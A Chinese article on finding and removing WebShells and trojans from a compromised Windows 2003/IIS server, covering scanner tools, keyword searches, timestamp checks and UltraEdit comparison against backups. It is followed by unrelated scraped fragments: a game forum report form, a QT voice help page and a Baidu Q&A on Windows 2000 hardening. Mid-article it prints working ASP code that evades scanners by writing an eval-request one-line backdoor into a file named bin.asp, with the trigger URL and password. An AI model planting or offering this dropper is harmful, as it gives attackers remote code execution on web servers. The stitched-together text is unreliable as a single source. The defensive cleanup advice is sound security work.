服务器被入侵后的应对之策―角落里的木马后门查杀之战
&&&&& 在脚本入侵如此疯狂的当今时代，脚本系统所谓的“0Day”漫天飞舞，一不小心WebShell就被放到了服务器上。如何干掉已经存在于服务器上的WebShell？估计很多朋友看到这个问题都会有些轻微的寒意，因为现在的WebShell太BT了，花样翻新而且层出不穷，简直就像打不死的小强！
以Windows Server 2003+ASP+SQL Server+IIS这个典型环境为例，本文列举三种常规的清理Webshell与木马后门的方法，如果你有更多关于此类亡羊补牢的金点子，欢迎到黑防官方论坛参与讨论！
工具查找Webshell
作为服务器管理者，网络上各种清理WebShell的工具应该人手一份，虽然这些工具做不到100%清理，但至少普通的WebShell是可以搞定的。这里给大家推荐两个：ASPCandy和ScanWebshell。
Aspcandy是村雨写的，发布的时间比较早，也没有再公开更新，但感觉还不错，至少可以省掉很多手工查找的麻烦，如图1所示。它主要用来查找被入侵过的机器上面是否有ASP后门，检查服务器上的ASP文件是否有危险操作存在。一般普通的用常规函数写的WebShell可以很方便的检测出来。
ScanWebshell是lake2在2006年中旬写的一个ASP页面形式的查询WebShell的工具，它可以查询ASP、cer、cdx、asa及其嵌套调用的任意格式文件，但图片ASP木马之类的查不到，如图2所示。其基本原理也是通过对特别函数做审查而判定是否为WebShell。
&&& 但是，这类软件出来以后，就好比木马查杀工具在免杀技术面前无奈一样，穷举类型的安全规则还是很容易被人突破，所以很快就有人提出了突破它的方法。突破代码如下所示。
pass="hacker"
If request("bin")= pass then
shell = "bin.asp"
Connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(shell)
set connad=server.createobject("adox.catalog")
connad.create connstr
Set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table cmd(shell text)")
conn.execute("insert into cmd (shell) values (&"&Chr("37")&"e"&"val+request("""&pass&""")"&chr("37")&"&)")
我们只要直接访问“xxx.asp?bin=hacker”就会在当前目录下生成一个bin.asp文件，连接密码为hacker。这段代码就可以躲避ScanWebShell，但是生成的bin.asp文件还是会被查杀。
手工查找WebShell
喜欢技术的人自然更喜欢手工去搞一些东西，这样对动手能力会有一定的提高。一般有实际用处的手工检测WebShell的方法也有两种：一种是通过特征字符进行判断，一种是通过系统时间进行判断。
所谓的特征字符判断，实际上和所有网上的清理工具使用的方法是一样的，就是对WebShell可能使用到的独特函数进行过滤，发现调用就仔细查看是不是WebShell。比如可以使用UltraEdit的查找功能，设定“Execute(Request("”为关键字符，对Web文件夹下的所有文件内容进行查询，以此来找出一句话后门。
这种方法的优点在于很容易找到有针对性的后门，比如一句话后门和网络上常见的后门，缺点是对未知的后门几乎没用。另外，深入挖掘UltraEdit的功能，我们还能找到更好地干掉WebShell等木马后门的方法，我将在下面单独进行说明。
另一种方法是通过系统时间来做第一次判断，在估算被放置后门时间的左右时间段内，查询所有服务器上网络用户可访问文件的修改、写入等相关操作，以此来确定WebShell的范围，并进一步仔细清理。比如查找所有上个月内，服务器上Web路径下的所有文件改动、生成时间。
在没有被人获得完全的服务器权限的情况下，用搜索的方法是比较有威力的，可以查出来所有可能有问题的文件，包括特殊后的WebShell、图片类型的WebShell。但是，一旦服务器被人搞掉了，拿到了高权限，文件时间却又是可以很容易修改的――所以，在确定服务器没有被搞掉的时候，大胆地使用这个方法去干掉WebShell吧！
深入挖掘UltraEdit
作为一个服务器，以常规Windows 2003 Server+IIS为例，需要日常关注的，无非是Web目录下的WebShell、目录下的木马、其他盘上的后门什么的，这些东西是需要时常注意的，指不定什么角落就被放了一个别人的东西。对于以上的种种，虽然我们不能完全做到100%发现、清理（比如Rookit被装上了就比较郁闷），但是可以用简单方法一网打尽！
用的工具很简单，就是上面提到的UltraEdit，原理就是对文件名、文件时间、文件内容、文件属性等进行综合比对！
现如今WebShell到处都是，典型的WebShell有一句话的、图片的、加密的、文件参数生成的、特殊后缀等，反倒是以前最典型的独立文件的WebShell比较少见了。木马、后门也是漫天飞，这个要归类就比较难了，根据本文内容我大致分了一下：不隐藏不删除自身、隐藏不删除自身、隐藏删除自身，以及单独Hook类的，比如Rookit或者驱动级的隐藏木马（特例，最后会讲）。对付这类的WebShell、木马，大家肯定都有自己的一套办法，我们今天只说用UltraEdit来查。
小提示：数据备份是安全人员必须要做的事，所以我们在测试前假定你有一份干净的备份，这个备份应该包括Web备份、系统文件备份（系统文件备份有更好的方法，这里不讨论，只用最笨最简单的：用PE之类的盘加载，把系统文件全部Copy出来）等――如果你说备份也是被搞过而不安全的，那抱歉，本文实在不太适合你。
下面以Web目录为例进行说明。比如我备份的所有Web文件都放在web-bak文件夹里，而实际给访问者提供使用的是Web目录，现在我们要查一查从备份开始到当下有可能出问题的文件。利用UltraEdit的文件夹比较功能，我们可以得到如图3所示的结果，它很明确地告诉了我们以下信息：
哪些文件不同时存在于两个文件夹里面，分别处于什么子目录；哪些文件同时存在于两个文件夹里面，分别处于什么子目录，但大小不同；哪些文件同时存在于两个文件夹里面，分别处于什么子目录，大小相同，但修改时间不同；哪些文件同时存在于两个文件夹里面，分别处于什么子目录，大小相同，修改时间相同，但文件属性不同；哪些文件同时存在于两个文件夹里面，分别处于什么子目录，大小相同，修改时间相同，文件属性相同，但NTFS数据流不同；哪些文件同时存在于两个文件夹里面，分别处于什么子目录，大小相同，修改时间相同，文件属性相同，NTFS数据流不同，但文件内容经过加密……等等。
通过以上的判断，我们可以查一句话WebShell、图片WebShell、加密WebShell、文件参数生成WebShell、特殊后缀Webshell，以及不隐藏不删除自身的木马、隐藏不删除自身的木马、隐藏删除自身的木马（需要比对系统文件）……
很强大吧？嘿嘿。但也有不足！比如Rootkit，我在测试的时候，使用了用户当前权限无法正常浏览到的Rootkit，它Hook了一些东西，在当前用户下是看不到的。在这样的情况下，使用UltraEdit是比对不出来的――这也算是这个方法的硬伤吧，不过我们也不能完全奢求工具不是!?
用好UltraEdit这个看似简单的功能，我们基本能够找到决大多数恶意的东西了，为我们日常的安全维护提供了很大的便利，美中不足的是对用户权限下无法访问的东西不能做出判断。
上面介绍的三个方法对于清理服务器上的WebShell和木马后门之类的恶意软件都是有一定作用的，对一般的WebShell和木马后门的清理也是比较有帮助的，服务器管理员在遇到此类问题后，可以用以上的方法做一下测试，可能会有很大帮助的
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。要正常浏览该网站，请开启浏览器的JavaScript支持。
16 熊猫人 武僧
无法查询。
暴力威胁。我们将严肃对待此类行为，并会上报有关部门。
发布的主题中包含其他玩家的个人信息。包括实际地址、邮箱地址、电话号码及不当的照片和/或视频。
骚扰或歧视性用语。此类言辞将不允许出现。
现实生活中的威胁
失效的链接
阐述理由(最多256字)
(C)2014 暴雪娱乐股份有限公司版权所有 由上海网之易网络科技发展有限公司运营
文网进字[号
新广出审[号
积极健康的游戏心态是健康游戏的开端，本游戏故事情节设置紧凑，请您合理控制游戏时间，避免沉溺游戏影响生活，注意自我保护，防范网络陷阱。健康游戏忠告：抵制不良游戏，拒绝盗版游戏。注意自我保护，谨防受骗上当。适度游戏益脑，沉迷游戏伤身。合理安排时间，享受健康生活。腾讯客服--QT语音-QT语音如何查找一个语音服务器？
QT语音如何查找一个语音服务器？
1、直接登录语音服务器
如果您已知服务器ID，可以在查找服务器窗口内选择连接界面，然后在服务器后面输入相应的ID，点登录即可直接登录对应服务器。
2、查找服务器
如果您不知道QT语音服务器ID，您可以通过查找服务器进入，选择列出所有在线服务器，就会将当前可用的语音服务器全部列出来。
您可以看到服务器的号码、名称、在线状态、人数、类型、所在地区、创建人等信息。人数是以类似于分数形势表示的，比如说65/200说明了当前服务器设定的最大登录人数为200，当前该服务器的在线人数为65人。
3、条件查找
如果您已经知道所要查找的服务器名称，您可以使用服务器名称作为查找条件进行精确查找。
以上信息是否已解决您的问题？如何查找本地的电影服务器？_百度知道
如何查找本地的电影服务器？
我原来是用的电信的2M上网，最近说什么换成了4M的，只给了一个账号和密码，说是本地有什么电影服务器，也不知道怎么找，以前公司的楼内有个在运行里面输入地址就可以进去了，现在我不知道具体的服务器地址，有什么办法可以查找？
我有更好的答案
按默认排序
影服务器的建立方法 　　一种是使用专用的软件，例如美萍VOD点播系统，此软件是一套功能强大、使用简单的VOD点播系统，其内置高效服务器引擎，采用多线程、多并发流处理技术，客户端支持Web界面点播或者应用程序界面点播两种界面。支持目前所有流行的媒体格式，并且自动生成网页文件，即使你设置了禁止下载也不会影响点播。惟一美中不足的就是电影放上去的时候是一级一级排放的，要是放个连续剧就很麻烦了。 　　另一种是使用ASP编的Web方式，利用共享或流媒体播放程序打开这些电影，例如“file://电影服务器名字/电影/百年好合”，这样的好处就是可以把电影分类，并利于查找，此类编好的程序很多地方都可以下载。然后顺便再建一个FTP服务器，大家电影多，要想资源共享一下，使用Serv-U这个软件就可以很简单地实现了。当然，在路由器上也要映射一下默认端口21，这样，可以建一个主页，然后通过路由器把80端口映射一下。 　　安全防范工作 　　由于Windows 2000漏洞较多，所以装好之后，需要做以下几件事情： 　　1、打补丁 　　微软的作风就是三天一小补，五天一大补，漏洞太多，补一点就好一点，使用“开始→Windows Update”然后把所有的补丁都装进去吧。 　　2、删除默认共享 　　1）删除IPC$共享 　　Windows 2000的缺省安装很容易被攻击者取得账号列表，即使安装了最新的Service pack也是如此。在Windows 2000中有一个缺省共享IPC$，并且还有诸如admin$ C$ D$等等，而IPC$允许匿名用户（即未经登录的用户）访问，利用这个缺省共享可以取得用户列表。 　　要想防范这些，可将在“管理工具→本地安全策略→安全设置→本地策略→安全选项”中的“对匿名连接的额外限制”修改为“不允许枚举SAM账号和共享”。就可以防止大部分此类连接，但是还没完，如果使用NetHacker只要使用一个存在的账号就又可以顺利地取得所有的账号名称。所以，我们还需要另一种方法做后盾。 　　创建一个文件Startup.cmd，内容就是一行命令“net share ipc$ delete”不包括引号；在Windows的计划任务中增加一项任务，执行以上的startup.cmd，时间安排为“计算机启动时执行”，或者把这个文件放到“开始→程序→启动”中让它一启动就删除IPC$共享；然后，重新启动服务器。 　　2）删除admin$共享，修改注册表： 　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters增加AutoShareWks子键（REG_DWORD），键值为0。 　　3）清除默认磁盘共享　C$、D$等，修改注册表： 　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters，增加AutoShareServer子键（REG_DWORD），键值为0。 　　3、修改默认用户名 　　在“管理工具→本地安全策略→安全设置→本地策略→安全选项”的“重命名来宾账户”将“guest”改成“abc”或者其他名字，下面机器登录名字设为名字，然后再把“重命名系统管理员账户”也改一下。
你开同的不是本地电影··4M是赠送电信的一个电影网站··你直接可以去电信主页搜索
可以打电话过去电信公司咨询一下
其他类似问题
电影服务器的相关知识
您可能关注的推广回答者：回答者：
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁